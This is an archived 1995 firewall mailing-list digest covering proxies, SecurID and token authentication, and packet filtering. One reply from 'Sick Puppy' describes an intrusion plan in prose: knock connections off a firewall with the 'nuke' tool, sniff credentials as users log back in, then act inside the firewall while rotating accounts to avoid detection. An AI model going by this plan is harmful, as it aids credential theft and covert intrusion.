May 1995 13:02:34 -0700 From: tom@pserv1.dot.state.az.us (Tom Brink) Message-Id: <199505062002.AA26245@pserv1.dot.state.az.us> Subject: Re: What if I don't have a proxy for my application? To: alan%mid.net@janus.dot.state.az.us Date: Sat, 6 May 95 13:02:34 MST Cc: firewalls%greatcircle.com@janus.dot.state.az.us (Firewalls) Reply-To: tom@pserv1.dot.state.az.us In-Reply-To: <199505061710.MAA26513@jayhawk.mid.net>; from "Alan Hannan" at May 6, 95 12:10 pm X-Mailer: ELM [version 07.05.00.00 (2.3 PL11)] X-Organization: Arizona Department of Transportation Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Alan Hannan writes: > > How do application level firewalls (e.g. BlackHole) handle applications > > that don't have a proxy program written for them? [lots deleted] > Does it run over tcp or udp? I do not believe that TIS's fwtk allows udp, but > I may well be wrong. Would someone be kind enough validate or correct me? Alan, fwtk's plug-gw 'plugs' tcp only. In the coming months I plan to 'plug' several sql clients to a server outside our firewall (TIS's fwtk). -- Tom Brink tom@dot.state.az.us Technical Support Specialist Technical Research Center Information Services Group Arizona Department of Transportation From firewalls-owner Sat May 6 14:39:08 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA29524 for firewalls-outgoing; Sat, 6 May 1995 14:31:48 -0700 Received: from ozarks.sgcl.lib.mo.us (ozarks.sgcl.lib.mo.us [128.206.1.212]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id OAA29519 for ; Sat, 6 May 1995 14:31:45 -0700 Received: by ozarks.sgcl.lib.mo.us (4.1/SMI-4.1) id AA07256; Sat, 6 May 95 16:32:01 CDT Date: Sat, 6 May 1995 16:32:00 -0500 (CDT) From: "B. Joe Smith" Subject: Re: nuke vs firewalls To: Sick Puppy Cc: Mark Barnes , firewalls@GreatCircle.com In-Reply-To: Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >From a Newbie: What is nuke? Joe Smith (Really!) On Tue, 2 May 1995, Sick Puppy wrote: > Thanks, but nope, taint in there. Done got one copy of nuke.c > but there usually be several versions of these critters hacked to varying > extents, so that some are more useful than others. Still looking. > > Come on you CERT and CIAC and DISA d00dz, where can I find nuke? > > Sick Puppy > the Cat_Eating_Dawg > Simple country boy, > who do simple things. > > From firewalls-owner Sat May 6 19:39:15 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id TAA03523 for firewalls-outgoing; Sat, 6 May 1995 19:32:16 -0700 Received: from gw2.att.com (gw1.att.com [192.20.239.133]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id TAA03518 for ; Sat, 6 May 1995 19:32:14 -0700 From: cmcurtin@clipper.cb.att.com Received: from clipper.cb.att.com by ig1.att.att.com id AA00122; Sat, 6 May 95 22:33:01 EDT Received: by clipper.cb.att.com (4.1/EMS-1.1 SunOS) id AA17257; Sat, 6 May 95 22:39:16 EDT Received: by clipper.cb.att.com (4.1/EMS-1.1 SunOS) id AA17246; Sat, 6 May 95 22:39:13 EDT Message-Id: <9505062239.ZM17244@clipper.cb.att.com> Date: Sat, 6 May 1995 22:39:12 -0400 In-Reply-To: Ivan Kaan <94165200@cpccux0.cityu.edu.hk> "" (May 5, 6:42pm) References: Subject: uns ?!!! X-Mailer: Z-Mail (3.2.1 15feb95) To: Ivan Kaan <94165200@cpccux0.cityu.edu.hk>, firewalls@GreatCircle.COM Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On May 5, 6:42pm, Ivan Kaan wrote: > uns firewalls I don't get it. Maybe everyone figures that since "unsuscribe" doesn't work, maybe abbreviating it to "uns" will work? Is it really that complicated to read the first message you get from the list that tells you how to unsubscribe? Sigh. -- C Matthew Curtin AT&T Bell Labs - Internet Gateway Group cmcurtin@clipper.cb.att.com From firewalls-owner Sat May 6 19:56:43 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id TAA03492 for firewalls-outgoing; Sat, 6 May 1995 19:25:17 -0700 Received: from gw2.att.com (gw1.att.com [192.20.239.133]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id TAA03487 for ; Sat, 6 May 1995 19:25:15 -0700 From: cmcurtin@clipper.cb.att.com Received: from clipper.cb.att.com by ig1.att.att.com id AA29640; Sat, 6 May 95 22:25:58 EDT Received: by clipper.cb.att.com (4.1/EMS-1.1 SunOS) id AA17090; Sat, 6 May 95 22:32:13 EDT Received: by clipper.cb.att.com (4.1/EMS-1.1 SunOS) id AA17081; Sat, 6 May 95 22:32:11 EDT Message-Id: <9505062232.ZM17079@clipper.cb.att.com> Date: Sat, 6 May 1995 22:32:10 -0400 In-Reply-To: Scott Surguine "FTP Accross firewall" (May 4, 5:43pm) References: <199505042343.AA24098@teal.csn.org> X-Mailer: Z-Mail (3.2.1 15feb95) To: Scott Surguine , firewalls@greatcircle.com Subject: Re: FTP Accross firewall Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On May 4, 5:43pm, Scott Surguine wrote: > Question: what is a good method that DOES NOT entail having to alter source- > code???? Well, I'm not sure this is the most elegant solution, but since you seem more interested in just having somthing that works (as opposed to hacking the code yourself ...) Try using Netscape (or some other web browser that supports proxy). Just set your FTP proxy to be your proxy server, and every time you use Netscape to FTP, it'll go through your proxy server. 'course this is assuming that you've got the proxy server running. This will just allow you to get a bunch of different clients talking to your servers... -- C Matthew Curtin AT&T Bell Labs - Internet Gateway Group cmcurtin@clipper.cb.att.com From firewalls-owner Sat May 6 23:33:59 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id WAA06120 for firewalls-outgoing; Sat, 6 May 1995 22:49:04 -0700 Received: from orpheus.amdahl.com (orpheus.amdahl.com [129.212.11.6]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id WAA06115 for ; Sat, 6 May 1995 22:49:01 -0700 Received: from brittany.oes.amdahl.com by orpheus.amdahl.com with smtp (Smail3.1.29.1 #1) id m0s7zDd-0000OgC; Sat, 6 May 95 22:49 PDT Received: by brittany.oes.amdahl.com (5.0/SMI-4.1/DNS) id AA19627; Sat, 6 May 1995 22:48:56 +0800 Date: Sat, 6 May 1995 22:48:56 +0800 From: patrick@oes.amdahl.com (Patrick Horgan) Message-Id: <9505070548.AA19627@brittany.oes.amdahl.com> To: hcb@clark.net Subject: SNMP and firewalls (was Re: Source Code) Cc: firewalls@greatcircle.com Content-Length: 51 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Firewall-1 already uses SNMP for control. Patrick _______________________________________________________________________ / These opinions are mine, and not Amdahl's (except by coincidence;). \ | (\ | | Patrick J. Horgan Amdahl Corporation \\ Have | | patrick@amdahl.com 1250 East Arques Avenue \\ _ Sword | | Phone : (408)992-2779 P.O. Box 3470 M/S 316 \\/ Will | | FAX : (408)773-0833 Sunnyvale, CA 94088-3470 _/\\ Travel | \___________________________O16-2294________________________\)__________/ From firewalls-owner Sat May 6 23:55:25 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id XAA06487 for firewalls-outgoing; Sat, 6 May 1995 23:05:21 -0700 Received: from chleuasme.francenet.fr (chleuasme.francenet.fr [194.2.144.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id IAA29444 for ; Wed, 3 May 1995 08:29:24 -0700 From: rapoport@dialup.francenet.fr Received: from rapoport.dialup.francenet.fr (rapoport.dialup.francenet.fr [194.2.149.203]) by chleuasme.francenet.fr (8.6.9/8.6.9) with SMTP id RAA14113 for ; Wed, 3 May 1995 17:29:37 +0200 Date: Wed, 3 May 1995 17:29:37 +0200 Message-Id: <199505031529.RAA14113@chleuasme.francenet.fr> X-Sender: rapoport@dialup.francenet.fr X-Mailer: Windows Eudora Version 1.4.4 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: firewalls@GreatCircle.com Subject: looking for a firewall running under AIX Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi, i am looking for a firewall product running on AIX. What i found is NetSP from IBM, which doesnt look great (few proxy applications, no accounting ...), and Interlock from ANS, which is not distributed in France. Does any one can help me ? P.S. : The other products I found are Firewall 1 and Gauntlet, but they are not runnig on AIX. Are ther other leader products ? From firewalls-owner Sun May 7 00:00:20 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id XAA06385 for firewalls-outgoing; Sat, 6 May 1995 23:03:12 -0700 Received: from jax.jaxnet.com (jax.jaxnet.com [204.183.221.4]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id OAA19471 for ; Tue, 2 May 1995 14:01:10 -0700 Received: from slip13.unf.edu (jax.jaxnet.com [204.183.221.4]) by jax.jaxnet.com (8.6.9/8.6.9) with SMTP id RAA18967 for ; Tue, 2 May 1995 17:05:41 -0400 Date: Tue, 2 May 1995 17:05:41 -0400 Message-Id: <199505022105.RAA18967@jax.jaxnet.com> X-Sender: bwern@jax.jaxnet.com X-Mailer: Windows Eudora Version 1.4.4 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: Firewalls@GreatCircle.COM From: bwern@jax.jaxnet.com (Ben Wern) Subject: Help with begining options? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hello. This may not specifically be in the charter, but I'm asking anyways. I'm trying to learn as much as possible about firewalls, etc. For my upcoming pitch for an internet connection for my company. If you guys/gals have a free second, I'd love it if you could look at what I am proposing, poke holes in it, and tell me where to go for more information. If not, just delete, but I'd appriciate it if you have the time. My current design consists of a router to connect to the 56k or ISDN link. The router dumps into a unsecure subnet that consists of whatever sacraficial lamb machines I have serving the outside word, and the Firewall. The firewall connects to our internal network. The firewall should allow any outgoing traffic, but restrict incoming traffic to ONLY SMTP to one machine inside the net. All other servers (FTP, WWW, Etc. are in the unprotected network.) My question lies in the Firewall server. I've been looking into Janus (or BorderWare, or whatever they're calling it now), but that seems to force us into using they're application servers, and might limit us as far as options go. I've also been looking into Gauntlet, from TIS, and just using the FWTK kit. Unfortunatly, I'm not expecting much money for this, so I expect I'll be forced to scrimp. :( Anyone care to offer thoughts, etc. for a new firewalls person? Thanks, Ben Wern bwern@jaxnet.com | PGP Key available by Finger! bwern@pathtech.com| PGP Mail gets priority! bwern@unf6.edu | Ask for it by name! "I used to get disgusted, but now I just get amused" From firewalls-owner Sun May 7 00:09:34 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id XAA07740 for firewalls-outgoing; Sat, 6 May 1995 23:36:53 -0700 Received: from northshore.ecosoft.com (northshore.ecosoft.com [192.233.85.129]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id XAA07678 for ; Sat, 6 May 1995 23:36:35 -0700 Received: from [198.115.177.224] (slip-0-24.shore.net) by northshore.ecosoft.com with SMTP id AA10865 (5.67a/IDA-1.5 for ); Sun, 7 May 1995 02:36:29 -0400 Message-Id: <199505070636.AA10865@northshore.ecosoft.com> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Sat, 6 May 1995 01:41:41 -0500 To: Firewalls@greatcircle.com From: vin@shore.net (Vin McLellan) Subject: SecurID (was Re: Secure Modem Pool) Cc: Steve.Waltner@wichitaks.hmpd.com, joep@ia.mc.xerox.com, woods@ncar.ucar.edu Sender: firewalls-owner@GreatCircle.COM Precedence: bulk When Steve Waltner asked: >What about a product from Security Dynamics and is called SecureID? >This setup sounds like a fairly secure setup to me, but I wanted other >opinions from readers of this mailing list. Joe Pennell responded: >>I had a chance to use the SecureID card at a former employer, and was very >>impressed. In addition to the features mentioned, I must add that admin >>of these things is great, especially if you have remote users. >>The one complaint that I might have is the way the PIN number works. The >>first >>time you use the card, you type the serial number into the server. You then >>give a PIN number, and the server maintains this info. But, all future >>connections are made on PIN number only, so the PIN number must be unique. If >>you only have a few remote users, this might be OK. As the number grows, it >>becomes a bit of a pain. Not to mention that if somebody tries a PIN and it >>doesn't work, they know that someone on the system already has it.... Actually, the PIN need not be unique. It is combined in series with the constantly changing card-code -- visible in the LCD display on the card -- to make up the momentarily-unique "passcode" that is a one-time password. (With the SecurID Pinpad cards, the PIN is typed _into_ the card and mathematically combined with the card-code.) According to the SDI manual, there should be no a need to type in the serial number. With a brand new card, you type in just the card-code, and then the server (a) either issues you a new PIN, or (b) prompts you create a PIN, with 4-8 digits or characters. SDI recommends a minimum 6-character PIN. (They also urge and recommend that their server be allowed to create and issue the PINs.) A new PIN should be rejected only when it doesn't fit the required PIN attributes, as originally specified by the Administrator. (Those attributes will also be on-screen when a user is choosing a PIN.) Greg Woods took issue with Mr. Pennell: >>>I thought admin of these things was a royal pain >>>in the butt. For one thing, the ONLY way to set the PIN number requires >>>running the "sdshell" program, which requires that the user have a login >>>shell account on a secured system. If you only want the users to access >>>your systems through a proxy login server using the SecurID card >>>to authenticate, it makes setting the PIN a real pain. The PIN, as noted above, can also be issued by SDI's ACE server. The SDI server also allows an Administrator to implement a "new PIN" mode which has the user type in the LCD card-code... and then, both the user and the server accept the next card-code as the user's PIN henceforth. (This makes even setting the PIN a single-transaction function, which meets the constraints imposed by some routers, comm servers, and modems.) For the first few years SDI sold the SecurIDs, the design required users to have their PINs issued by the ACE server. It was only around '89 that SDI allowed users to select their own PINs -- and that was to allow MVS users to "choose" their RAC-F password (a hack that effectively integrated SecurID and RAC-F.) >>>Plus I found the menu-driven administration program very annoying; >>>absolutely no way to automate any of the routine tasks. I sympathize with you. Token/password management is a pain, and the trend is to expand functionality to allow Administrators more control options for handling the needs of larger, enterprise-wide, networks. I know that when SDI chieftain Chuck Stuckie toured Wall Street a month ago (just before SDI went public and promptly doubled its share-price) he told analysts that SDI was wrapping up development on a GUI interface and a new, more powerful, ACE card-management database. That should ease and speed up administrative tasks. >>>It is also quite easy for a user to disable their own card by making too >>>many >>>consecutive mistakes logging in. I understand that the reason for this is >>>to >>>prevent random guessing of the password, but the administrator has almost no >>>control over this. The ACE server protects itself against brute-force attacks by disabling an account where ten consecutive invalid passcodes have been entered. When the server can parse a passcode -- and can identify a valid PIN, followed by an invalid card-code -- the server demands the user type in the next LCD card-code (on the assumption that the card may be out of time-synch.) At set-up, the Administrator selects the number of times the user will be allowed to enter a valid-PIN/invalid card-code combination (1 to 5, default at 3) before the ACE system blocks the account. The SecurID controls are tightest where the users are allowed the most latitude to weaken the system. ACE disables an account when it is fed three invalid PINs followed by valid card-codes. In this case, the paranoid system suspects it is dealing with a stolen card -- and, because of fear that the user chose a small or predictable PIN, the gate slams shut more quickly than in the face of other threats. >>>Another problem is that Security Dynamics works on the TRUST US model (see >>>previous recent flame war) in that their algorithm for generating passwords >>>is proprietary and we have no way of knowing how secure it REALLY is. Your problem, I think, is that the algorithm is secret, not that it is proprietary. I remember arguing with Ken Weiss, the SecurID inventor, about this before SDI had a product. Weiss agreed that the secrecy of the algorithm should in no way be a factor in the real security of the product. (Indeed, any security analysis, a la Kerckhoff, has to presume that an attacker has been able to obtain the algorithm.) Weiss' argument then was that his target markets -- then, particularly, banks and financial service firms -- were more comfortable with a secret algorithm. It is one additional protective barrier, but the secrecy of the algorithm serves a commercial -- not a cryptographic -- function. I also recall there was some fear of a knock-off card out of China, or some other patent-scorning state. Then as now, there were a number of public algorithms which, like SecurID, could process the precise time, and a secret card-specific "seed," to offer an equivalent passcode (secure in the sense of being unpredictable to someone who didn't have the secret seed for that card.) Weiss just didn't want to deal with some international entity claiming that their card was wholly identical to the SecurID. To address the trust issue, SDI took several approaches. First, SDI allows virtually any responsible party access to the algorithm and the necessary tools to examine and test it, under a non-disclosure agreement. Select customers (upon signing over a few first-born sons) even get the source code. (I presume it was this type of independent examination which preceded the adoption of the ACE/SecurID package by crypto-savvy elements of the defense and nuclear energy establishments in most Western nations.) SDI took another approach that intrigued me. In cryptographic theory, there is no way to _prove_ such an algorithm "secure." The only way to justify a claim of security (unpredictability of output) is to subject the algorithm of an on-going series of attacks, classic and new. Over many years, SDI has commissioned a series of American and European cryptographers to study, test, and beat on the SecurID algorithm -- thus far, with no breech. Reports on the array of tests and attacks, and the results (over the signatures of notable luminaries in cryptoanalysis,) are, I presume, available from SDI for prospective customers. I have the SDI client/server manual on my desk, so I may sound informed -- but please direct technical queries or general requests for information to: SDI@shore.net. I don't speak for Security Dynamics. SDI has been an occasional client of my firm for many years, however, and I think the SecurID is an elegant piece of tech. I also wish I bought the stock;-( Suere, Vin -- Vin McLellan +The Privacy Guild+ USA Tel. (617) 884-5546 Mail: 53 Nichols St., Chelsea, Ma. 02150 '''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''' ''''''' From firewalls-owner Sun May 7 00:16:01 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id XAA07265 for firewalls-outgoing; Sat, 6 May 1995 23:22:02 -0700 Received: from icnucevx.cnuce.cnr.it (icnucevx.cnuce.cnr.it [131.114.1.30]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id JAA12177 for ; Fri, 5 May 1995 09:49:03 -0700 Received: from fly.cnuce.cnr.IT by mailsrv.cnuce.cnr.it (PMDF V4.3-13 #6635) id <01HQ5KCBP3B4I02IKH@mailsrv.cnuce.cnr.it>; Fri, 05 May 1995 18:49:17 +0100 (MET) Received: by fly.cnuce.cnr.IT (Smail3.1.26.7 #1) id m0s7QZS-0002MpC; Fri, 5 May 95 18:49 MET Date: Fri, 05 May 1995 18:49 +0100 (MET) From: claudio@fly.CNUCE.CNR.IT (Claudio Telmon) Subject: help with begining options? To: firewalls@greatcircle.com Message-id: Content-transfer-encoding: 7BIT Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > From: George Mullins > Date: Tue, 2 May 1995 21:36:10 -0700 > Subject: Re: Help with begining options? > > Alan Hannan writes: > > > The firewall should allow any outgoing traffic, but restrict incoming > > > traffic to ONLY SMTP to one machine inside the net. All other servers > > > (FTP, WWW, Etc. are in the unprotected network.) > > > > Of course you realize that by this method you make your entire internal > > subnet only as strong as that SMTP server. Just an observation. > > And a wrong observation. While I would suggest using smap or sendmail > on a machine on a DMZ network, if the only incoming traffic is > restricted to SMTP, what is the attacker going to do that they > couldn't do with any other type of firewall setup. Mail will be > passed in any design. The problem with the last sendmail bug wasn't the incoming SMTP connection, it was the outgoing ident connection. Correct me if I'm wrong, but by allowing any outgoing connection, the bug could be exploited. - Claudio claudio@fire.di.unipi.it From firewalls-owner Sun May 7 01:39:16 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id BAA10802 for firewalls-outgoing; Sun, 7 May 1995 01:27:24 -0700 Received: from clark.net (clark.net [168.143.0.7]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id BAA10793 for ; Sun, 7 May 1995 01:27:19 -0700 Received: (hcb@localhost) by clark.net (8.6.12/8.6.5) id EAA29067; Sun, 7 May 1995 04:27:48 -0400 From: Howard Berkowitz Message-Id: <199505070827.EAA29067@clark.net> Subject: Re: SNMP and firewalls (was Re: Source Code) To: patrick@oes.amdahl.com (Patrick Horgan) Date: Sun, 7 May 1995 04:27:48 -0400 (EDT) Cc: hcb@clark.net, firewalls@greatcircle.com In-Reply-To: <9505070548.AA19627@brittany.oes.amdahl.com> from "Patrick Horgan" at May 6, 95 10:48:56 pm X-Mailer: ELM [version 2.4 PL24alpha3] MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit Content-Length: 170 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Patrick Horgan observed, > > Firewall-1 already uses SNMP for control. My question is whether a vendor-independent firewall MIB would be practical and useful. Howard From firewalls-owner Sun May 7 04:13:01 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id EAA12557 for firewalls-outgoing; Sun, 7 May 1995 04:05:35 -0700 Received: from dedalus.iol.ie (dedalus.iol.ie [193.120.234.38]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id EAA12552 for ; Sun, 7 May 1995 04:05:22 -0700 Received: from joyce.iol.ie (root@joyce.iol.ie [194.125.2.240]) by dedalus.iol.ie Sendmail(v8.6.12) with ESMTP id MAA17142 for ; Sun, 7 May 1995 12:05:41 +0100 Received: from a2-slip47.iol.ie (a2-slip47.iol.ie [194.125.2.47]) by joyce.iol.ie Sendmail(v8.6.12) with SMTP id MAA28557 for ; Sun, 7 May 1995 12:05:32 +0100 To: firewalls@greatcircle.com From: itl@iol.ie (Paul Murphy) Subject: itl@iol.ie Date: Sun, 7 May 1995 11:09:28 Message-ID: Sender: firewalls-owner@GreatCircle.COM Precedence: bulk itl@iol.ie From firewalls-owner Sun May 7 05:39:11 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA13366 for firewalls-outgoing; Sun, 7 May 1995 05:36:50 -0700 Received: from uvs1.orl.mmc.com (uvs1.orl.mmc.com [141.240.192.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id FAA13361 for ; Sun, 7 May 1995 05:36:46 -0700 Received: from TCCSLR.DECnet MAIL11D_V3 by uvs1.orl.mmc.com (5.57/Ultrix3.0-C) id AA07010; Sun, 7 May 95 08:18:03 -0400 Date: Sun, 7 May 95 08:18:03 -0400 Message-Id: <9505071218.AA07010@uvs1.orl.mmc.com> From: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security) To: "firewalls@greatcircle.com"@UVS1.dnet.mmc.com Subject: One Time Password Tokens Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Basically there are two types of tokens today, time synchronous and challenge response. Both work well (one went white water rafting in Alaska with a SecurID in my wallet - it survived and have been using the same SafeWord for over four years now) and each has limitations/ strengths. The time synchronous are the easiest to use, just read off a number and type it in plus a PIN, the biggest problem being drift and a "window of operation" that could be exploited. Challenge/response are a bit more cumbersome to use - has a calculator- like keypad, you enter a PIN+challenge, push a button, and then type in the response. Both have the same fundamental drawback: cost, typically U$50-U$60 per user. - hard to justify for 170,000 users - and need to be replaced about every three years on the average. Recently two companies using challenge-response technology (Enigma-Logic and Secure Computing) have introduced the next logical step, software based tokens. In each, software is running in the background on the user's computer that recognizes whan a challenge is received and pops up a window for the user to enter her/his/etc. PIN. The process is then handled entirely in the background. As a result the PC becomes the token and no external hardware is necessary. Further the cost is tied to software on the host computer, token cost for the individual users can become zero (and has in one case). The problem with incorporating such a scheme to a time synchronous operation is that the clock drift on a PC is notoriously bad. There is a way that host/PC could first synchronize their clocks but I have not seen anyone do that, yet. Point is that PIN + PC keeps the two factor authentication deemed sufficient (something you know - PIN - and something you have - PC/software). True, software can be copied but there should be ways around that limitation and the benefits would be IMNSHO well worth the additional risk. Besides you can still have token cards for those "in harms way", this just lets everyone have them. Warmly, Padgett From firewalls-owner Sun May 7 07:39:11 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA14479 for firewalls-outgoing; Sun, 7 May 1995 07:21:33 -0700 Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.76.24]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id HAA14474 for ; Sun, 7 May 1995 07:21:29 -0700 Message-Id: <199505071421.HAA14474@miles.greatcircle.com> Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA110516615; Mon, 8 May 1995 00:23:36 +1000 From: Darren Reed Subject: IP packet filtering... To: firewalls@greatcircle.com Date: Mon, 8 May 1995 00:23:35 +1000 (EST) X-Mailer: ELM [version 2.4 PL23] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 516 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I'd like to suggest that anyone who filters by port or the "established" bit in their firewall add a rule which works *before* anything which might match that description to drop _all_ fragmented IP packets. They can pose a very large problem and rather than speculate about whether your vendor's filtering does it "right" or can handle it at all, it is better to just make yourself immune. I can't see anything in the FAQ about this and it has been quite a while since I have seen anyone ask about this. darren From firewalls-owner Sun May 7 07:45:02 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA14497 for firewalls-outgoing; Sun, 7 May 1995 07:25:55 -0700 Received: from sequoia.itd.uts.EDU.AU (sequoia.itd.uts.EDU.AU [138.25.16.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id HAA14492 for ; Sun, 7 May 1995 07:25:48 -0700 Received: from lordmuck.itd.uts.edu.au. by sequoia.itd.uts.EDU.AU with SMTP id AA12541 (5.65c/IDA-1.4.4 for ); Mon, 8 May 1995 00:26:14 +1000 Received: (from matt@localhost) by lordmuck.itd.uts.edu.au. (8.6.12/Jas 1.1) id AAA02764; Mon, 8 May 1995 00:26:22 +1000 From: Jas (Matthew K) Message-Id: <199505071426.AAA02764@lordmuck.itd.uts.edu.au.> Subject: Re: One Time Password Tokens To: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson P.E. Information Security) Date: Mon, 8 May 1995 00:26:21 +1000 (EST) Cc: firewalls@greatcircle.com (Firewalls Mailing List) In-Reply-To: <9505071218.AA07010@uvs1.orl.mmc.com> from "A. Padgett Peterson, P.E. Information Security" at May 7, 95 08:18:03 am X-Gc: GCV 2.1 GAT/M/CS d--(-+) H-- s++:-- g+ p? !au a-(?) w+++ v+ C+++$ X-Gc: UVS++++$ P+>+++ L- 3+++ E-(++) N++ K W--- M+ V-- -po+(+) Y+ t+ X-Gc: !5++ jx R+ G? !tv b+++ D++ B e+ u--(**) h- f+(*) r n- !y X-Ph: ph: +61 2 330 1390 fax: +61 2 330 1999 home: +61 2 416 5722 X-Pager: +61 2 214 1111 #849482 X-Mailer: ELM [version 2.4 PL23] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 824 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk A. Padgett Peterson, P.E. Information Security wrote this... > The problem with incorporating such a scheme to a time synchronous > operation is that the clock drift on a PC is notoriously bad. There > is a way that host/PC could first synchronize their clocks but I > have not seen anyone do that, yet. SecureRPC has a mechanism that does exactly this.. has done for years, and yes RPC is available for platforms other than Un*x Matt -- #!/bin/sh echo '16i[q]sa[ln0=aln100%Pln100/snlbx]sbA0D3F204445524F42snlbxq'|dc;exit Matthew Keenan Systems Programmer Information Technology Division University of Technology Sydney Australia It's nice to be in a position where people apologize because they assume there's humor in your work, based on past experience, but they're not sure where it is. -- Rob Pike From firewalls-owner Sun May 7 08:39:31 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA15004 for firewalls-outgoing; Sun, 7 May 1995 08:31:20 -0700 Received: from relay2.UU.NET (relay2.UU.NET [192.48.96.7]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id IAA14999 for ; Sun, 7 May 1995 08:31:17 -0700 Received: from maestro.Maestro.COM by relay2.UU.NET with SMTP id QQyosc16516; Sun, 7 May 1995 11:31:47 -0400 Received: by maestro.Maestro.COM (4.1/MAESTRO-0.1/07-03-93) id AA18351; Sun, 7 May 95 11:27:03 EDT Date: Sun, 7 May 1995 11:27:02 -0400 (EDT) From: Sick Puppy Subject: Re: nuke vs firewalls To: jsmith01@ozarks.sgcl.lib.mo.us Cc: firewalls@GreatCircle.com Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > From a Newbie: What is nuke? It is a kewl tool, which forces a shutdown of all the TCP/IP connections to a system. All the users get disconnected. A detailed discussion of exactly how to use the nuke/sniffer combination to get the user-id and password of EVERYONE that uses the system really belongs in alt.2600. My interest in nuke is because some idiots permit rlogin or something similar to the inside of their firewalls, which they are assume are safe, because they block such connections from the outside. Suppose that Country Joe (CJ) has done his homework and has a sniffer program running inside the network of Clueless Corp. which permits internal rlogin or some such to its firewall. If CJ accesses their network via dial up, he might be able to nuke the firewall and get the user-id and password of everyone when they log back into it. There is at least one developer and one other sys admin besides the guy who is responsible for running the firewall, that have accounts on the firewall. Real dumb move by Clueless Corp. Now CJ can do his own development in the firewall, preferably between 1 a.m. and 5 a.m. and each of the three will think it is one of the others and be glad they they have a real life. If CJ does this about once a month, the sys admin dudes will say "Gee, I wish those damn tech's would stop fooling with the routers." Assuming that CJ changes the account he uses every month, the chance that the development he is doing in the firewall will be detected is somewhere between zero and none. > Joe Smith (Really!) Yeah, and since I had my sex-change operation I have been the lesbian lover of Pricess Dianna. Sick Puppy the Cat_Eating_Dawg From firewalls-owner Sun May 7 09:09:11 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA15898 for firewalls-outgoing; Sun, 7 May 1995 09:03:26 -0700 Received: from blackhole.milkyway.com (milkyway.com [198.53.167.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id JAA15893 for ; Sun, 7 May 1995 09:03:21 -0700 Received: from localhost (uucp@localhost) by blackhole.milkyway.com (8.6.5/8.6.6) id MAA18632 for ; Sun, 7 May 1995 12:12:33 -0400 Received: from jupiter.milkyway.com(192.168.77.9) by internet.milkyway.com via smap (V1.3) id sma018628; Sun May 7 12:12:23 1995 Received: from metis.milkyway.com (mcr@metis.milkyway.com [192.168.77.21]) by jupiter.milkyway.com (8.6.7/8.6.6) with ESMTP id MAA26979; Sun, 7 May 1995 12:08:04 -0400 From: Michael Richardson Received: by metis.milkyway.com (8.6.9/BSDI-Client) id MAA19029; Sun, 7 May 1995 12:14:58 -0400 Date: Sun, 7 May 1995 12:14:58 -0400 Message-Id: 